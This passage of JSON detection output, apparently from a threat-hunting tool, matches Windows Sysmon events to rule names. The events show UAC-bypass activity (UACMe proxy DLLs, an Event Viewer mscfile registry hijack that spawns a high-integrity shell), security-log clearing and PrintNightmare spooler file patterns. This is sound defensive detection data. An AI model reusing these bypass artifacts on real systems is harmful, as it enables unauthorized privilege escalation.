17:38:11.146"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2362765,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.147605Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\Public\\tools\\privesc\\uac","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1586556212-2165235939-1437495523-1001\\Environment\\systemroot","UtcTime":"2020-11-26 17:38:11.151"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2362767,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.152295Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:06:53.846","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-78DD-5D45-0000-0010B8A50301","ProcessId":5080,"RuleName":"PrivEsc - UAC Bypass UACME 23","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\dismcore.dll","UtcTime":"2019-08-03 
12:06:53.846"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5429,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:06:53.933988Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-04 09:33:57.716","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A685-5D46-0000-00109B2AD703","ProcessId":3916,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-04 09:33:57.716"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5763,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:33:57.800853Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 15:08:06.372","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A356-5D45-0000-001029AA9901","ProcessId":4480,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","UtcTime":"2019-08-03 15:08:06.372"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5527,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:06.419322Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"EventData":{"Company":"Hazardous Environments","Description":"UACMe proxy DLL","FileVersion":"3.1.9.1905","Hashes":"SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847","Image":"C:\\Windows\\System32\\mmc.exe","ImageLoaded":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","ProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ProcessId":4056,"Product":"UACMe","RuleName":"Execution - Image Loaded from suspicious path","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-08-03 
15:08:07.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":5531,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:07.508962Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" eventvwr.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ParentProcessId":4056,"ProcessGuid":"747F3D96-A357-5D45-0000-0010BD149A01","ProcessId":5396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 
15:08:07.355"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5532,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:07.558917Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-09 01:59:28.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11112,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T01:59:28.669022Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"\"C:\\Windows\\system32\\eventvwr.exe\" ","ParentImage":"C:\\Windows\\System32\\eventvwr.exe","ParentProcessGuid":"365ABB72-8980-5CD3-0000-00105F451F00","ParentProcessId":3884,"ProcessGuid":"365ABB72-8980-5CD3-0000-0010134D1F00","ProcessId":3840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 01:59:28.903"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11116,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T01:59:29.090897Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1102,"EventRecordID":161471,"Execution_attributes":{"ProcessID":1276,"ThreadID":6720},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T18:04:36.333991Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x52a7d","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 13:50:26.727","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9122-5D45-0000-0010710D6101","ProcessId":3508,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-03 13:50:26.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5518,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T13:50:26.782725Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC 
Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:31:14.985","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7E92-5D45-0000-0010FF472601","ProcessId":4884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\GdiPlus.dll","UtcTime":"2019-08-03 12:31:14.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5487,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:31:15.096244Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Using Consent and Comctl32 - File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:08:13.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-792D-5D45-0000-00104F190601","ProcessId":5336,"RuleName":"PrivEsc - UAC Bypass UACME 22","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\comctl32.dll","UtcTime":"2019-08-03 
12:08:13.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5438,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:08:13.818381Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342291,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551382Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New","UtcTime":"2020-08-12 
13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342292,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551399Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.DLL","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342293,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551413Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 
13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRVUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342294,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562442Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.GPD","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342295,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562798Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File 
Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342296,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562856Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342297,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562922Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation 
Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.INI","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342298,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562970Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.DLL","UtcTime":"2020-08-12 
13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342299,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563018Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342300,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563107Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 
13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342301,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563213Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIRES.DLL","UtcTime":"2020-08-12 